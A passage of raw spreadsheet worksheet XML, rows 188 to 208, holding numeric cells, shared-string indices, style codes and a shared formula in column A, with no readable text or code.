      <c r="F188" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G188" s="8"/>
      <c r="H188" s="6">
        <v>0.0</v>
      </c>
      <c r="I188" s="6">
        <v>272.0</v>
      </c>
      <c r="J188" s="20"/>
      <c r="K188" s="20"/>
      <c r="L188" s="20"/>
      <c r="M188" s="20"/>
      <c r="N188" s="20"/>
      <c r="O188" s="4" t="s">
        <v>651</v>
      </c>
      <c r="P188" s="4" t="s">
        <v>652</v>
      </c>
      <c r="Q188" s="6">
        <v>6101300.0</v>
      </c>
      <c r="R188" s="8"/>
      <c r="S188" s="6">
        <v>6101300.0</v>
      </c>
      <c r="T188" s="8"/>
      <c r="U188" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V188" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W188" s="2" t="s">
        <v>653</v>
      </c>
      <c r="X188" s="6">
        <v>0.0</v>
      </c>
      <c r="Y188" s="6">
        <v>2.0</v>
      </c>
      <c r="Z188" s="6">
        <v>0.0</v>
      </c>
      <c r="AA188" s="8"/>
      <c r="AB188" s="8"/>
      <c r="AC188" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE188" s="8"/>
      <c r="AF188" s="14"/>
    </row>
    <row r="189">
      <c r="A189" s="6">
        <f t="shared" si="1"/>
        <v>0.8538271479</v>
      </c>
      <c r="B189" s="6">
        <v>6.2594262E7</v>
      </c>
      <c r="C189" s="6">
        <v>1.0</v>
      </c>
      <c r="D189" s="6">
        <v>6.259738E7</v>
      </c>
      <c r="E189" s="8"/>
      <c r="F189" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G189" s="8"/>
      <c r="H189" s="6">
        <v>-2.0</v>
      </c>
      <c r="I189" s="6">
        <v>82.0</v>
      </c>
      <c r="J189" s="20"/>
      <c r="K189" s="20"/>
      <c r="L189" s="20"/>
      <c r="M189" s="20"/>
      <c r="N189" s="20"/>
      <c r="O189" s="4" t="s">
        <v>654</v>
      </c>
      <c r="P189" s="4" t="s">
        <v>655</v>
      </c>
      <c r="Q189" s="6">
        <v>2352611.0</v>
      </c>
      <c r="R189" s="8"/>
      <c r="S189" s="8"/>
      <c r="T189" s="8"/>
      <c r="U189" s="8"/>
      <c r="V189" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W189" s="2" t="s">
        <v>656</v>
      </c>
      <c r="X189" s="6">
        <v>2.0</v>
      </c>
      <c r="Y189" s="6">
        <v>0.0</v>
      </c>
      <c r="Z189" s="8"/>
      <c r="AA189" s="8"/>
      <c r="AB189" s="8"/>
      <c r="AC189" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE189" s="8"/>
      <c r="AF189" s="14"/>
    </row>
    <row r="190">
      <c r="A190" s="6">
        <f t="shared" si="1"/>
        <v>0.07554173624</v>
      </c>
      <c r="B190" s="6">
        <v>6.8459491E7</v>
      </c>
      <c r="C190" s="6">
        <v>1.0</v>
      </c>
      <c r="D190" s="7"/>
      <c r="E190" s="8"/>
      <c r="F190" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G190" s="8"/>
      <c r="H190" s="6">
        <v>23.0</v>
      </c>
      <c r="I190" s="6">
        <v>33764.0</v>
      </c>
      <c r="J190" s="17"/>
      <c r="K190" s="17"/>
      <c r="L190" s="17"/>
      <c r="M190" s="17"/>
      <c r="N190" s="17"/>
      <c r="O190" s="4" t="s">
        <v>657</v>
      </c>
      <c r="P190" s="4" t="s">
        <v>658</v>
      </c>
      <c r="Q190" s="6">
        <v>1.574953E7</v>
      </c>
      <c r="R190" s="7"/>
      <c r="S190" s="7"/>
      <c r="T190" s="7"/>
      <c r="U190" s="8"/>
      <c r="V190" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W190" s="2" t="s">
        <v>659</v>
      </c>
      <c r="X190" s="6">
        <v>5.0</v>
      </c>
      <c r="Y190" s="6">
        <v>0.0</v>
      </c>
      <c r="Z190" s="6">
        <v>0.0</v>
      </c>
      <c r="AA190" s="7"/>
      <c r="AB190" s="7"/>
      <c r="AC190" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE190" s="8"/>
      <c r="AF190" s="15"/>
    </row>
    <row r="191">
      <c r="A191" s="6">
        <f t="shared" si="1"/>
        <v>0.2247567847</v>
      </c>
      <c r="B191" s="6">
        <v>7.6016354E7</v>
      </c>
      <c r="C191" s="6">
        <v>1.0</v>
      </c>
      <c r="D191" s="8"/>
      <c r="E191" s="8"/>
      <c r="F191" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G191" s="8"/>
      <c r="H191" s="6">
        <v>0.0</v>
      </c>
      <c r="I191" s="6">
        <v>19.0</v>
      </c>
      <c r="J191" s="20"/>
      <c r="K191" s="20"/>
      <c r="L191" s="20"/>
      <c r="M191" s="20"/>
      <c r="N191" s="20"/>
      <c r="O191" s="4" t="s">
        <v>660</v>
      </c>
      <c r="P191" s="4" t="s">
        <v>661</v>
      </c>
      <c r="Q191" s="6">
        <v>2.1643763E7</v>
      </c>
      <c r="R191" s="8"/>
      <c r="S191" s="8"/>
      <c r="T191" s="8"/>
      <c r="U191" s="8"/>
      <c r="V191" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W191" s="2" t="s">
        <v>662</v>
      </c>
      <c r="X191" s="6">
        <v>0.0</v>
      </c>
      <c r="Y191" s="6">
        <v>0.0</v>
      </c>
      <c r="Z191" s="8"/>
      <c r="AA191" s="8"/>
      <c r="AB191" s="8"/>
      <c r="AC191" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE191" s="8"/>
      <c r="AF191" s="14"/>
    </row>
    <row r="192">
      <c r="A192" s="6">
        <f t="shared" si="1"/>
        <v>0.4228397771</v>
      </c>
      <c r="B192" s="6">
        <v>2.667639E7</v>
      </c>
      <c r="C192" s="6">
        <v>1.0</v>
      </c>
      <c r="D192" s="6">
        <v>2.667656E7</v>
      </c>
      <c r="E192" s="8"/>
      <c r="F192" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G192" s="8"/>
      <c r="H192" s="6">
        <v>1.0</v>
      </c>
      <c r="I192" s="6">
        <v>2558.0</v>
      </c>
      <c r="J192" s="20"/>
      <c r="K192" s="20"/>
      <c r="L192" s="20"/>
      <c r="M192" s="20"/>
      <c r="N192" s="20"/>
      <c r="O192" s="4" t="s">
        <v>663</v>
      </c>
      <c r="P192" s="4" t="s">
        <v>664</v>
      </c>
      <c r="Q192" s="6">
        <v>2286508.0</v>
      </c>
      <c r="R192" s="8"/>
      <c r="S192" s="8"/>
      <c r="T192" s="8"/>
      <c r="U192" s="8"/>
      <c r="V192" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W192" s="2" t="s">
        <v>665</v>
      </c>
      <c r="X192" s="6">
        <v>1.0</v>
      </c>
      <c r="Y192" s="6">
        <v>1.0</v>
      </c>
      <c r="Z192" s="6">
        <v>0.0</v>
      </c>
      <c r="AA192" s="8"/>
      <c r="AB192" s="8"/>
      <c r="AC192" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE192" s="8"/>
      <c r="AF192" s="14"/>
    </row>
    <row r="193">
      <c r="A193" s="6">
        <f t="shared" si="1"/>
        <v>0.5850992806</v>
      </c>
      <c r="B193" s="6">
        <v>3.0461145E7</v>
      </c>
      <c r="C193" s="6">
        <v>1.0</v>
      </c>
      <c r="D193" s="6">
        <v>3.0472669E7</v>
      </c>
      <c r="E193" s="8"/>
      <c r="F193" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G193" s="8"/>
      <c r="H193" s="6">
        <v>8.0</v>
      </c>
      <c r="I193" s="6">
        <v>1784.0</v>
      </c>
      <c r="J193" s="20"/>
      <c r="K193" s="20"/>
      <c r="L193" s="20"/>
      <c r="M193" s="20"/>
      <c r="N193" s="20"/>
      <c r="O193" s="4" t="s">
        <v>666</v>
      </c>
      <c r="P193" s="4" t="s">
        <v>667</v>
      </c>
      <c r="Q193" s="6">
        <v>1868924.0</v>
      </c>
      <c r="R193" s="8"/>
      <c r="S193" s="6">
        <v>1868924.0</v>
      </c>
      <c r="T193" s="8"/>
      <c r="U193" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V193" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W193" s="2" t="s">
        <v>668</v>
      </c>
      <c r="X193" s="6">
        <v>2.0</v>
      </c>
      <c r="Y193" s="6">
        <v>0.0</v>
      </c>
      <c r="Z193" s="6">
        <v>0.0</v>
      </c>
      <c r="AA193" s="8"/>
      <c r="AB193" s="8"/>
      <c r="AC193" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE193" s="8"/>
      <c r="AF193" s="14"/>
    </row>
    <row r="194">
      <c r="A194" s="6">
        <f t="shared" si="1"/>
        <v>0.7350023375</v>
      </c>
      <c r="B194" s="6">
        <v>5.7616079E7</v>
      </c>
      <c r="C194" s="6">
        <v>1.0</v>
      </c>
      <c r="D194" s="6">
        <v>5.7616323E7</v>
      </c>
      <c r="E194" s="8"/>
      <c r="F194" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G194" s="8"/>
      <c r="H194" s="6">
        <v>0.0</v>
      </c>
      <c r="I194" s="6">
        <v>61.0</v>
      </c>
      <c r="J194" s="17"/>
      <c r="K194" s="17"/>
      <c r="L194" s="17"/>
      <c r="M194" s="17"/>
      <c r="N194" s="17"/>
      <c r="O194" s="4" t="s">
        <v>669</v>
      </c>
      <c r="P194" s="4" t="s">
        <v>670</v>
      </c>
      <c r="Q194" s="6">
        <v>1.1396199E7</v>
      </c>
      <c r="R194" s="7"/>
      <c r="S194" s="6">
        <v>1.1396199E7</v>
      </c>
      <c r="T194" s="7"/>
      <c r="U194" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V194" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W194" s="2" t="s">
        <v>671</v>
      </c>
      <c r="X194" s="6">
        <v>2.0</v>
      </c>
      <c r="Y194" s="6">
        <v>10.0</v>
      </c>
      <c r="Z194" s="7"/>
      <c r="AA194" s="7"/>
      <c r="AB194" s="7"/>
      <c r="AC194" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE194" s="8"/>
      <c r="AF194" s="15"/>
    </row>
    <row r="195">
      <c r="A195" s="6">
        <f t="shared" si="1"/>
        <v>0.9261701188</v>
      </c>
      <c r="B195" s="6">
        <v>1649101.0</v>
      </c>
      <c r="C195" s="6">
        <v>1.0</v>
      </c>
      <c r="D195" s="8"/>
      <c r="E195" s="8"/>
      <c r="F195" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G195" s="8"/>
      <c r="H195" s="6">
        <v>0.0</v>
      </c>
      <c r="I195" s="6">
        <v>293.0</v>
      </c>
      <c r="J195" s="17"/>
      <c r="K195" s="17"/>
      <c r="L195" s="17"/>
      <c r="M195" s="17"/>
      <c r="N195" s="17"/>
      <c r="O195" s="4" t="s">
        <v>672</v>
      </c>
      <c r="P195" s="4" t="s">
        <v>673</v>
      </c>
      <c r="Q195" s="6">
        <v>281465.0</v>
      </c>
      <c r="R195" s="7"/>
      <c r="S195" s="6">
        <v>37386.0</v>
      </c>
      <c r="T195" s="7"/>
      <c r="U195" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V195" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W195" s="2" t="s">
        <v>674</v>
      </c>
      <c r="X195" s="6">
        <v>2.0</v>
      </c>
      <c r="Y195" s="6">
        <v>1.0</v>
      </c>
      <c r="Z195" s="7"/>
      <c r="AA195" s="7"/>
      <c r="AB195" s="7"/>
      <c r="AC195" s="2" t="s">
        <v>51</v>
      </c>
      <c r="AE195" s="8"/>
      <c r="AF195" s="15"/>
    </row>
    <row r="196">
      <c r="A196" s="6">
        <f t="shared" si="1"/>
        <v>0.5816833553</v>
      </c>
      <c r="B196" s="6">
        <v>2.9971092E7</v>
      </c>
      <c r="C196" s="6">
        <v>1.0</v>
      </c>
      <c r="D196" s="6">
        <v>2.9971392E7</v>
      </c>
      <c r="E196" s="8"/>
      <c r="F196" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G196" s="8"/>
      <c r="H196" s="6">
        <v>2.0</v>
      </c>
      <c r="I196" s="6">
        <v>2729.0</v>
      </c>
      <c r="J196" s="20"/>
      <c r="K196" s="20"/>
      <c r="L196" s="20"/>
      <c r="M196" s="20"/>
      <c r="N196" s="20"/>
      <c r="O196" s="4" t="s">
        <v>675</v>
      </c>
      <c r="P196" s="4" t="s">
        <v>676</v>
      </c>
      <c r="Q196" s="6">
        <v>1199684.0</v>
      </c>
      <c r="R196" s="8"/>
      <c r="S196" s="6">
        <v>1199684.0</v>
      </c>
      <c r="T196" s="8"/>
      <c r="U196" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V196" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W196" s="2" t="s">
        <v>677</v>
      </c>
      <c r="X196" s="6">
        <v>1.0</v>
      </c>
      <c r="Y196" s="6">
        <v>0.0</v>
      </c>
      <c r="Z196" s="8"/>
      <c r="AA196" s="8"/>
      <c r="AB196" s="8"/>
      <c r="AC196" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE196" s="8"/>
      <c r="AF196" s="14"/>
    </row>
    <row r="197">
      <c r="A197" s="6">
        <f t="shared" si="1"/>
        <v>0.05553286852</v>
      </c>
      <c r="B197" s="6">
        <v>2941654.0</v>
      </c>
      <c r="C197" s="6">
        <v>1.0</v>
      </c>
      <c r="D197" s="8"/>
      <c r="E197" s="8"/>
      <c r="F197" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G197" s="8"/>
      <c r="H197" s="6">
        <v>-2.0</v>
      </c>
      <c r="I197" s="6">
        <v>361.0</v>
      </c>
      <c r="J197" s="20"/>
      <c r="K197" s="20"/>
      <c r="L197" s="20"/>
      <c r="M197" s="20"/>
      <c r="N197" s="20"/>
      <c r="O197" s="4" t="s">
        <v>678</v>
      </c>
      <c r="P197" s="4" t="s">
        <v>679</v>
      </c>
      <c r="Q197" s="6">
        <v>354329.0</v>
      </c>
      <c r="R197" s="8"/>
      <c r="S197" s="8"/>
      <c r="T197" s="8"/>
      <c r="U197" s="8"/>
      <c r="V197" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W197" s="2" t="s">
        <v>680</v>
      </c>
      <c r="X197" s="6">
        <v>1.0</v>
      </c>
      <c r="Y197" s="6">
        <v>1.0</v>
      </c>
      <c r="Z197" s="8"/>
      <c r="AA197" s="8"/>
      <c r="AB197" s="8"/>
      <c r="AC197" s="2" t="s">
        <v>51</v>
      </c>
      <c r="AE197" s="8"/>
      <c r="AF197" s="14"/>
    </row>
    <row r="198">
      <c r="A198" s="6">
        <f t="shared" si="1"/>
        <v>0.5480630304</v>
      </c>
      <c r="B198" s="6">
        <v>6.6448085E7</v>
      </c>
      <c r="C198" s="6">
        <v>1.0</v>
      </c>
      <c r="D198" s="8"/>
      <c r="E198" s="8"/>
      <c r="F198" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G198" s="8"/>
      <c r="H198" s="6">
        <v>-2.0</v>
      </c>
      <c r="I198" s="6">
        <v>258.0</v>
      </c>
      <c r="J198" s="20"/>
      <c r="K198" s="20"/>
      <c r="L198" s="20"/>
      <c r="M198" s="20"/>
      <c r="N198" s="20"/>
      <c r="O198" s="4" t="s">
        <v>681</v>
      </c>
      <c r="P198" s="4" t="s">
        <v>682</v>
      </c>
      <c r="Q198" s="6">
        <v>1.5318065E7</v>
      </c>
      <c r="R198" s="8"/>
      <c r="S198" s="8"/>
      <c r="T198" s="8"/>
      <c r="U198" s="8"/>
      <c r="V198" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W198" s="2" t="s">
        <v>159</v>
      </c>
      <c r="X198" s="6">
        <v>1.0</v>
      </c>
      <c r="Y198" s="6">
        <v>0.0</v>
      </c>
      <c r="Z198" s="8"/>
      <c r="AA198" s="8"/>
      <c r="AB198" s="8"/>
      <c r="AC198" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE198" s="8"/>
      <c r="AF198" s="14"/>
    </row>
    <row r="199">
      <c r="A199" s="6">
        <f t="shared" si="1"/>
        <v>0.5900977259</v>
      </c>
      <c r="B199" s="6">
        <v>7.5926153E7</v>
      </c>
      <c r="C199" s="6">
        <v>1.0</v>
      </c>
      <c r="D199" s="6">
        <v>7.5927137E7</v>
      </c>
      <c r="E199" s="8"/>
      <c r="F199" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G199" s="8"/>
      <c r="H199" s="6">
        <v>1.0</v>
      </c>
      <c r="I199" s="6">
        <v>87.0</v>
      </c>
      <c r="J199" s="20"/>
      <c r="K199" s="20"/>
      <c r="L199" s="20"/>
      <c r="M199" s="20"/>
      <c r="N199" s="20"/>
      <c r="O199" s="4" t="s">
        <v>683</v>
      </c>
      <c r="P199" s="4" t="s">
        <v>684</v>
      </c>
      <c r="Q199" s="6">
        <v>2.1562421E7</v>
      </c>
      <c r="R199" s="8"/>
      <c r="S199" s="8"/>
      <c r="T199" s="8"/>
      <c r="U199" s="8"/>
      <c r="V199" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W199" s="2" t="s">
        <v>685</v>
      </c>
      <c r="X199" s="6">
        <v>1.0</v>
      </c>
      <c r="Y199" s="6">
        <v>0.0</v>
      </c>
      <c r="Z199" s="8"/>
      <c r="AA199" s="8"/>
      <c r="AB199" s="8"/>
      <c r="AC199" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE199" s="8"/>
      <c r="AF199" s="14"/>
    </row>
    <row r="200">
      <c r="A200" s="6">
        <f t="shared" si="1"/>
        <v>0.4262308783</v>
      </c>
      <c r="B200" s="6">
        <v>6.9600335E7</v>
      </c>
      <c r="C200" s="6">
        <v>1.0</v>
      </c>
      <c r="D200" s="8"/>
      <c r="E200" s="8"/>
      <c r="F200" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G200" s="8"/>
      <c r="H200" s="6">
        <v>3.0</v>
      </c>
      <c r="I200" s="6">
        <v>2613.0</v>
      </c>
      <c r="J200" s="17"/>
      <c r="K200" s="17"/>
      <c r="L200" s="17"/>
      <c r="M200" s="17"/>
      <c r="N200" s="17"/>
      <c r="O200" s="4" t="s">
        <v>686</v>
      </c>
      <c r="P200" s="4" t="s">
        <v>687</v>
      </c>
      <c r="Q200" s="6">
        <v>2333663.0</v>
      </c>
      <c r="R200" s="7"/>
      <c r="S200" s="6">
        <v>2333663.0</v>
      </c>
      <c r="T200" s="7"/>
      <c r="U200" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V200" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W200" s="2" t="s">
        <v>688</v>
      </c>
      <c r="X200" s="6">
        <v>1.0</v>
      </c>
      <c r="Y200" s="6">
        <v>2.0</v>
      </c>
      <c r="Z200" s="6">
        <v>0.0</v>
      </c>
      <c r="AA200" s="7"/>
      <c r="AB200" s="7"/>
      <c r="AC200" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE200" s="8"/>
      <c r="AF200" s="15"/>
    </row>
    <row r="201">
      <c r="A201" s="6">
        <f t="shared" si="1"/>
        <v>0.3105072376</v>
      </c>
      <c r="B201" s="6">
        <v>6.0764422E7</v>
      </c>
      <c r="C201" s="6">
        <v>1.0</v>
      </c>
      <c r="D201" s="8"/>
      <c r="E201" s="8"/>
      <c r="F201" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G201" s="8"/>
      <c r="H201" s="6">
        <v>0.0</v>
      </c>
      <c r="I201" s="6">
        <v>61.0</v>
      </c>
      <c r="J201" s="20"/>
      <c r="K201" s="20"/>
      <c r="L201" s="20"/>
      <c r="M201" s="20"/>
      <c r="N201" s="20"/>
      <c r="O201" s="4" t="s">
        <v>689</v>
      </c>
      <c r="P201" s="4" t="s">
        <v>690</v>
      </c>
      <c r="Q201" s="6">
        <v>2934341.0</v>
      </c>
      <c r="R201" s="8"/>
      <c r="S201" s="8"/>
      <c r="T201" s="8"/>
      <c r="U201" s="8"/>
      <c r="V201" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W201" s="2" t="s">
        <v>691</v>
      </c>
      <c r="X201" s="6">
        <v>1.0</v>
      </c>
      <c r="Y201" s="6">
        <v>2.0</v>
      </c>
      <c r="Z201" s="8"/>
      <c r="AA201" s="8"/>
      <c r="AB201" s="8"/>
      <c r="AC201" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE201" s="8"/>
      <c r="AF201" s="14"/>
    </row>
    <row r="202">
      <c r="A202" s="6">
        <f t="shared" si="1"/>
        <v>0.08084312076</v>
      </c>
      <c r="B202" s="6">
        <v>1020218.0</v>
      </c>
      <c r="C202" s="6">
        <v>1.0</v>
      </c>
      <c r="D202" s="6">
        <v>1020249.0</v>
      </c>
      <c r="E202" s="8"/>
      <c r="F202" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G202" s="8"/>
      <c r="H202" s="6">
        <v>35.0</v>
      </c>
      <c r="I202" s="6">
        <v>11445.0</v>
      </c>
      <c r="J202" s="17"/>
      <c r="K202" s="17"/>
      <c r="L202" s="17"/>
      <c r="M202" s="17"/>
      <c r="N202" s="17"/>
      <c r="O202" s="4" t="s">
        <v>692</v>
      </c>
      <c r="P202" s="4" t="s">
        <v>693</v>
      </c>
      <c r="Q202" s="6">
        <v>115200.0</v>
      </c>
      <c r="R202" s="7"/>
      <c r="S202" s="6">
        <v>115200.0</v>
      </c>
      <c r="T202" s="7"/>
      <c r="U202" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V202" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W202" s="2" t="s">
        <v>694</v>
      </c>
      <c r="X202" s="6">
        <v>13.0</v>
      </c>
      <c r="Y202" s="6">
        <v>9.0</v>
      </c>
      <c r="Z202" s="6">
        <v>0.0</v>
      </c>
      <c r="AA202" s="7"/>
      <c r="AB202" s="7"/>
      <c r="AC202" s="2" t="s">
        <v>51</v>
      </c>
      <c r="AE202" s="8"/>
      <c r="AF202" s="15"/>
    </row>
    <row r="203">
      <c r="A203" s="6">
        <f t="shared" si="1"/>
        <v>0.05007105139</v>
      </c>
      <c r="B203" s="6">
        <v>5.8900707E7</v>
      </c>
      <c r="C203" s="6">
        <v>1.0</v>
      </c>
      <c r="D203" s="7"/>
      <c r="E203" s="8"/>
      <c r="F203" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G203" s="8"/>
      <c r="H203" s="6">
        <v>0.0</v>
      </c>
      <c r="I203" s="6">
        <v>396.0</v>
      </c>
      <c r="J203" s="17"/>
      <c r="K203" s="17"/>
      <c r="L203" s="17"/>
      <c r="M203" s="17"/>
      <c r="N203" s="17"/>
      <c r="O203" s="4" t="s">
        <v>695</v>
      </c>
      <c r="P203" s="4" t="s">
        <v>696</v>
      </c>
      <c r="Q203" s="6">
        <v>1.2343136E7</v>
      </c>
      <c r="R203" s="7"/>
      <c r="S203" s="7"/>
      <c r="T203" s="7"/>
      <c r="U203" s="8"/>
      <c r="V203" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W203" s="2" t="s">
        <v>697</v>
      </c>
      <c r="X203" s="6">
        <v>0.0</v>
      </c>
      <c r="Y203" s="6">
        <v>3.0</v>
      </c>
      <c r="Z203" s="7"/>
      <c r="AA203" s="7"/>
      <c r="AB203" s="7"/>
      <c r="AC203" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE203" s="8"/>
      <c r="AF203" s="15"/>
    </row>
    <row r="204">
      <c r="A204" s="6">
        <f t="shared" si="1"/>
        <v>0.231966674</v>
      </c>
      <c r="B204" s="6">
        <v>5.7306171E7</v>
      </c>
      <c r="C204" s="6">
        <v>1.0</v>
      </c>
      <c r="D204" s="7"/>
      <c r="E204" s="8"/>
      <c r="F204" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G204" s="8"/>
      <c r="H204" s="6">
        <v>0.0</v>
      </c>
      <c r="I204" s="6">
        <v>48.0</v>
      </c>
      <c r="J204" s="17"/>
      <c r="K204" s="17"/>
      <c r="L204" s="17"/>
      <c r="M204" s="17"/>
      <c r="N204" s="17"/>
      <c r="O204" s="4" t="s">
        <v>698</v>
      </c>
      <c r="P204" s="4" t="s">
        <v>699</v>
      </c>
      <c r="Q204" s="6">
        <v>3928796.0</v>
      </c>
      <c r="R204" s="7"/>
      <c r="S204" s="7"/>
      <c r="T204" s="7"/>
      <c r="U204" s="8"/>
      <c r="V204" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W204" s="2" t="s">
        <v>700</v>
      </c>
      <c r="X204" s="6">
        <v>0.0</v>
      </c>
      <c r="Y204" s="6">
        <v>3.0</v>
      </c>
      <c r="Z204" s="6">
        <v>0.0</v>
      </c>
      <c r="AA204" s="7"/>
      <c r="AB204" s="7"/>
      <c r="AC204" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE204" s="8"/>
      <c r="AF204" s="15"/>
    </row>
    <row r="205">
      <c r="A205" s="6">
        <f t="shared" si="1"/>
        <v>0.9801448169</v>
      </c>
      <c r="B205" s="6">
        <v>5.0507183E7</v>
      </c>
      <c r="C205" s="6">
        <v>1.0</v>
      </c>
      <c r="D205" s="7"/>
      <c r="E205" s="8"/>
      <c r="F205" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G205" s="8"/>
      <c r="H205" s="6">
        <v>2.0</v>
      </c>
      <c r="I205" s="6">
        <v>835.0</v>
      </c>
      <c r="J205" s="17"/>
      <c r="K205" s="17"/>
      <c r="L205" s="17"/>
      <c r="M205" s="17"/>
      <c r="N205" s="17"/>
      <c r="O205" s="4" t="s">
        <v>701</v>
      </c>
      <c r="P205" s="4" t="s">
        <v>702</v>
      </c>
      <c r="Q205" s="7"/>
      <c r="R205" s="2" t="s">
        <v>703</v>
      </c>
      <c r="T205" s="2" t="s">
        <v>703</v>
      </c>
      <c r="U205" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V205" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W205" s="2" t="s">
        <v>704</v>
      </c>
      <c r="X205" s="6">
        <v>1.0</v>
      </c>
      <c r="Y205" s="6">
        <v>0.0</v>
      </c>
      <c r="Z205" s="6">
        <v>0.0</v>
      </c>
      <c r="AA205" s="7"/>
      <c r="AB205" s="7"/>
      <c r="AC205" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE205" s="8"/>
      <c r="AF205" s="15"/>
    </row>
    <row r="206">
      <c r="A206" s="6">
        <f t="shared" si="1"/>
        <v>0.6048746403</v>
      </c>
      <c r="B206" s="6">
        <v>6.9115861E7</v>
      </c>
      <c r="C206" s="6">
        <v>1.0</v>
      </c>
      <c r="D206" s="8"/>
      <c r="E206" s="8"/>
      <c r="F206" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G206" s="8"/>
      <c r="H206" s="6">
        <v>0.0</v>
      </c>
      <c r="I206" s="6">
        <v>153.0</v>
      </c>
      <c r="J206" s="17"/>
      <c r="K206" s="17"/>
      <c r="L206" s="17"/>
      <c r="M206" s="17"/>
      <c r="N206" s="17"/>
      <c r="O206" s="4" t="s">
        <v>705</v>
      </c>
      <c r="P206" s="4" t="s">
        <v>706</v>
      </c>
      <c r="Q206" s="6">
        <v>1.6751156E7</v>
      </c>
      <c r="R206" s="7"/>
      <c r="S206" s="6">
        <v>4294399.0</v>
      </c>
      <c r="T206" s="7"/>
      <c r="U206" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V206" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W206" s="2" t="s">
        <v>707</v>
      </c>
      <c r="X206" s="6">
        <v>1.0</v>
      </c>
      <c r="Y206" s="6">
        <v>0.0</v>
      </c>
      <c r="Z206" s="7"/>
      <c r="AA206" s="7"/>
      <c r="AB206" s="7"/>
      <c r="AC206" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE206" s="8"/>
      <c r="AF206" s="15"/>
    </row>
    <row r="207">
      <c r="A207" s="6">
        <f t="shared" si="1"/>
        <v>0.4143191797</v>
      </c>
      <c r="B207" s="6">
        <v>7.5698532E7</v>
      </c>
      <c r="C207" s="6">
        <v>1.0</v>
      </c>
      <c r="D207" s="8"/>
      <c r="E207" s="8"/>
      <c r="F207" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G207" s="8"/>
      <c r="H207" s="6">
        <v>1.0</v>
      </c>
      <c r="I207" s="6">
        <v>166.0</v>
      </c>
      <c r="J207" s="20"/>
      <c r="K207" s="20"/>
      <c r="L207" s="20"/>
      <c r="M207" s="20"/>
      <c r="N207" s="20"/>
      <c r="O207" s="4" t="s">
        <v>708</v>
      </c>
      <c r="P207" s="4" t="s">
        <v>709</v>
      </c>
      <c r="Q207" s="6">
        <v>2.1267834E7</v>
      </c>
      <c r="R207" s="8"/>
      <c r="S207" s="8"/>
      <c r="T207" s="8"/>
      <c r="U207" s="8"/>
      <c r="V207" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W207" s="2" t="s">
        <v>710</v>
      </c>
      <c r="X207" s="6">
        <v>0.0</v>
      </c>
      <c r="Y207" s="6">
        <v>1.0</v>
      </c>
      <c r="Z207" s="8"/>
      <c r="AA207" s="8"/>
      <c r="AB207" s="8"/>
      <c r="AC207" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE207" s="8"/>
      <c r="AF207" s="14"/>
    </row>
    <row r="208">
      <c r="A208" s="6">
        <f t="shared" si="1"/>
        <v>0.0526890143</v>
      </c>
      <c r="B208" s="6">
        <v>3.1360198E7</v>
      </c>
      <c r="C208" s="6">
        <v>1.0</v>
      </c>
      <c r="D208" s="6">
        <v>3.1360251E7</v>
      </c>
      <c r="E208" s="8"/>
      <c r="F208" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G208" s="8"/>
      <c r="H208" s="6">
        <v>0.0</v>
      </c>
      <c r="I208" s="6">
        <v>971.0</v>
